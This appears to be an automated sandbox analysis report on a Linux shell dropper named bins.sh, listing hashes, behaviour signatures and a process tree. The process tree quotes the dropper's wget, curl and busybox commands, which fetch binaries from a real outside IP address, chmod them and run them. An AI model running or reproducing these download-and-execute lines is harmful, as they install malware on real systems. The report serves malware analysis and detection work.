Analysis

  • max time kernel
    5s
  • max time network
    37s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240611-en
  • resource tags

    arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
  • submitted
    24-11-2024 06:16

General

  • Target

    bins.sh

  • Size

    10KB

  • MD5

    b643808c01faa0f92bf870288eb8dd16

  • SHA1

    494306996b3ee0573b6da340ee334523cd39f9eb

  • SHA256

    b594f506a2b2e54b98f320880c32150a5c66038299c0f69d9f7105521f0b89ad

  • SHA512

    f8e2bed091a7cf127f3feadc979a7ee81e9835a68b98f78afc737f354cdf3348e42f4551cc47d805e0734fd77e02963e665aad84c33c02e18395f86754ae24cb

  • SSDEEP

    96:+Hb3G9hf3INVTX1G+Emzer6e0D7tAokHbrf3+PTX1G+1emzer6wN6W:+Hb3VvTX1G+EmzereTX1G+Mmzerx

Malware Config

Signatures

  • File and Directory Permissions Modification 1 TTPs 1 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 1 IoCs
  • Checks CPU configuration 1 TTPs 1 IoCs

    Checks CPU information which indicate if the system is a virtual machine.

  • Reads runtime system information 2 IoCs

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory 3 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/bins.sh
    /tmp/bins.sh
    1⤵
      PID:645
      • /bin/rm
        /bin/rm bins.sh
        2⤵
          PID:647
        • /usr/bin/wget
          wget http://216.126.231.240/bins/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59
          2⤵
          • Writes file to tmp directory
          PID:653
        • /usr/bin/curl
          curl -O http://216.126.231.240/bins/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59
          2⤵
          • Checks CPU configuration
          • Reads runtime system information
          • Writes file to tmp directory
          PID:677
        • /bin/busybox
          /bin/busybox wget http://216.126.231.240/bins/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59
          2⤵
          • Writes file to tmp directory
          PID:699
        • /bin/chmod
          chmod 777 Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59
          2⤵
          • File and Directory Permissions Modification
          PID:707
        • /tmp/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59
          ./Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59
          2⤵
          • Executes dropped EXE
          PID:709
        • /bin/rm
          rm Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59
          2⤵
            PID:714
          • /usr/bin/wget
            wget http://216.126.231.240/bins/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7
            2⤵
              PID:716

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • /tmp/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59

            Filesize

            107KB

            MD5

            eb9c3a0de91fcf16ba17cb24608df68c

            SHA1

            09d95a7d70d5e115d103be51edff7c498d272fac

            SHA256

            dd01a1365a9f35501e09e0144ed1d4d8b00dcf20aa66cf6dc186e94d7dbe4b47

            SHA512

            9e1f3f88f82bb41c68d78b351c8dc8075522d6d42063f798b6ef38a491df7a3bab2c312d536fb0a6333e516d7dc4f5a58b80beb69422a04d1dbc61eaba346e27